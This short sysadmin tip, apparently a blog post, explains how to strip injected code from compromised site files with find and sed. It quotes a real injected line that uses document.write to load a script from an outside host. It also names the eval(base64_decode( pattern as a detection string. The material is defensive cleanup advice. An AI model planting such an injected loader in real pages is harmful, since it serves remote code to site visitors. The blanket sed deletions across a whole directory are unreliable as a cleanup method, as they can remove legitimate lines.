When you experience code injection in your site and there is only appending of code to the end of your site files you can clean it with :

cd to your site’s httpdocs and run:

find .  -type f -exec sed -i ‘/oployau.fancountblogger.com/d’ {} \;

for lines like :

js/ac_runactivecontent.js:document.write(‘<s’+’cript type=”text/javascript” src=”http://oployau.fancountblogger.com:8080/Link.js”></scr’+’ipt>’);

or just

find . -name “*.php” -type f -exec sed -i ‘/eval(base64_decode(/d’ {} \;

if you want to check/repair only php files with base64 encoded injection.

Of course you need shell access for this or you can just request you hosting guys to do it for you.